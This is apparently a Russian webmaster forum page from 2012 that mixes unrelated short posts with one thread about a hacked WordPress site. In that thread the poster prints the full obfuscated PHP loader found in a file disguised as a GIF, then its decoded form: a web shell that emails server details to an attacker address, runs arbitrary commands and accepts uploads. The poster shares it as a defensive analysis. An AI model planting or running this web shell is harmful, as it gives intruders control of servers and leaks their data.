fsou1

Подробностей никаких.

Отправили пример письма, то что их кол-во 30.000 и 100 Мб логов.

Спасибо за ссылку, сейчас попробую воспользоваться.

---------- Добавлено 26.10.2012 в 15:50 ----------

Не успешно =\ Ничего толком не нашлось

---------- Добавлено 26.10.2012 в 16:12 ----------

Благодаря сканированию на вирусы, встроенному в cpanel, удалось найти 3 файла в каталогах вордпресс:

/site.ru/o.php

/site.ru/wp-includes/wp-simple.php

которые, вероятно, и стали причиной рассылки. Вот только вопрос, как теперь определить, откуда они взялись? =\

---------- Добавлено 26.10.2012 в 16:49 ----------

Поступило продолжение.

В файле /site.ru/wp-includes/wp-simple.php находится следующее содержимое:

GIF89a
?
??????????!??
????,????
?
??D
?;?<?php



session_start();



error_reporting(0);



$string = 'rUh6QuNTEP5cpPsPyzYnJzpjoEWlE8ToKJgStRAaJ/0CyNrYm3EPe3rtrsmliP/emV07L8cdpdIhUjgzzzMvz4wnXKlPxYqXhTJPztoHneNqO29X2rtPeGHarTgKo6g/uL71Juwze/DuO52fnt7ttB6FFiYpKnZVQA6A1E3wCTwibvhqOLyll6PRWnw5iFP0Ht1Pft5lD8O/xm40isfDvgNZimcJCMpFU5ZZzggwa2/IncTQyKcI03nK84OUA/STkCKeTpUeGuO8Vbm3qn8F7JCnluZWpYRMT/jo9CKMrwbnIQQYXFzQ4+dqOzzT/BXUNYB5d65XrgLIOC+0mSwly2x71ZHn/sen5+dQkKnumT+YT06Q75GG4dVgFGGQZSayNmi9w0OYAuanGU39pMjpHqFJKbpUL5kWGfkNx8IkmRtGHmi7jUmgTdPOnezfkIirVI6F1F3cVgLWfp0GzFqt1En+b+z1lNdvvUB8+GBIEtNpszq/h6NbL8kKyWR6Y3hnRKmEYu6BF50N+zej+KL/dGt9bRVtaRdFro0gwRpoPjgbX4XXo2s4GIy8e59pF+W+kFZJARSftcjLjPvlvMQtRNzJ7PLtERew4xr4gStn9KYVOmUrBKBxXhDaM8Jx/HEs/5DFT5J9EtnaVjTnTNbrOmJiouwHu6l20wJeNi3+4cEvJCkymNrPH+0fAEKov8rt015qsiK3wBhKMPSAtqkPrcZgAH2MNbY7Pu28NccYCNBZJdLAU8qX8AgRSSl8V3N45+x453NMYsqHUISEFMcaSmmkne0w01cmUxSSlAtVU2PHklLq3rcEWmEjW0igjUVyodvo3/O6nl1V69pSX8alaGj2D9GhuKmUJHXxAdxZ+HbDYbe9tn8rxd3d/8kB6O8nqROhcR5VpmWS4zkBpWLwvhJzNQgoPWxd0LMiz5lZGwF7T5aVIXNM8oAa/sVDghoHNMlGuu2NqlYu1n4Xh5JUlkj2+wPgu0vZiWq8XSmHAdkQbJUZRDJyLGE/coY1lTftYDf/0cK4zAqWkguRZNtTF9EvupmLNOWyrkm72rcARuDXYdxa/FfrnB9dtEqruOYLyz4im1J5xFQ1Hfvw1zqP5At8oCTJmNaBblsESnHtoxOz0tY1vCXvxolSxWE9VGGOeXIZqcB4X67fgd2WraPh1OUA6ck67ETGKxzdbY0k3j3gLMjubl488thS53aMgPY3KSYvcFSDy7uqxrd26m9+VSjs1t2RcyvgSpKnaxeeiTvIccsfSFbCtSYGWf7X4eBrHZ0TbVme7dv2T+Rt6RuV4R2xktXOPLW/XMB3QUXMvwh6NPyyLLXhubdEYa9HfPMK4rYwxZnbFIwMG6eDw4OD91EVC3xtYvEuRxuTatb0YcPfjNl6ZWA7/wI=';



eval(gzinflate(str_rot13(base64_decode($string))));



?>

которое при расшифровке превращается в:

error_reporting(0);

if (!isset($_SESSION['bajak']))	{

$visitcount = 0;

$web = $_SERVER["HTTP_HOST"];

$inj = $_SERVER["REQUEST_URI"];

$body = "ada yang inject \n$web$inj";

$safem0de = @ini_get('safe_mode');

if (!$safem0de) {$security= "SAFE_MODE = OFF";}

else {$security= "SAFE_MODE = ON";};

$serper=gethostbyname($_SERVER['SERVER_ADDR']);

$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);

mail("injectortarget@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");

$_SESSION['bajak'] = 0;

}

else {$_SESSION['bajak']++;};

if(isset($_GET['clone'])){

$source = $_SERVER['SCRIPT_FILENAME'];

$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-simple.php";

rename($source, $desti);

}

$safem0de = @ini_get('safe_mode');

if (!$safem0de) {$security= "SAFE_MODE : OFF";}

else {$security= "SAFE_MODE : ON";}

echo "<title>UnKnown - Simple Shell</title><br><br>";

echo "<font size=2 color=#888888><b>".$security."</b><br>";

$cur_user="(".get_current_user().")";

echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";

echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";

function pwd() {

$cwd = getcwd();

if($u=strrpos($cwd,'/')){

if($u!=strlen($cwd)-1){

return $cwd.'/';}

else{return $cwd;};

}

elseif($u=strrpos($cwd,'\\')){

if($u!=strlen($cwd)-1){

return $cwd.'\\';}

else{return $cwd;};

};

}

echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';

echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';

if(isset($_POST['submit'])){

$uploaddir = pwd();

if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};

move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);

if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){

echo "Upload Failed";

} else { echo "Upload Success to ".$uploaddir.$name." :D "; }

}

if(isset($_POST['command'])){

$cmd = $_POST['cmd'];

if(function_exists('system')){

echo "<pre>";

echo "<textarea name=cmd cols=100% rows=10%>";

system($cmd);

echo "</textarea>";

echo "</pre>";

}

}

Таким образом, на первый взгляд, индонезийский друг получает доступ к серверу и имеет возможность загружать свои файлы.

Так что, советую Вам провериться на наличие таких файлов в директории вордпресса.

Вопрос в том, откуда взялись эти wp-simple.php файлы =\\

Как же всё печально =\

https://best-hoster.ru/info/tarifs.html

Тариф profy, шаред хостинг?

Скорее читаю

Время устраивать лобное место, где провинившегося участника Андрея вся поляна будет обсуждать, осуждать и голосовать за то, чтобы он покинул проект.

Но постойте, кому же ведущие дадут иммунитет?

Вы про атрибут title у ссылки? Он Вам и в помощь при поиске по коду.

Прошел октябрьский курс, ничего нового (кроме некоторых моментов работы с контекстом и вариантами сбора ключей) не узнал, но для новичков, действительно, сойдет.

Омрачилось к сожалению впечатление от курса тем, что у автора, видимо, в середине курса стало очень мало времени и занятия отправлялись не по графику, а по 2-3 за раз. Так же это сказалось на обсуждении результатов и возможных корректировок, которых, увы, не получил.

Другими словами, получил список документов и доступ на форум.

Плов и оливье :)

1. Жутко медленно грузится сайт;

2. На главной специально опечатка в тайтле?

Всем добра :) С праздником.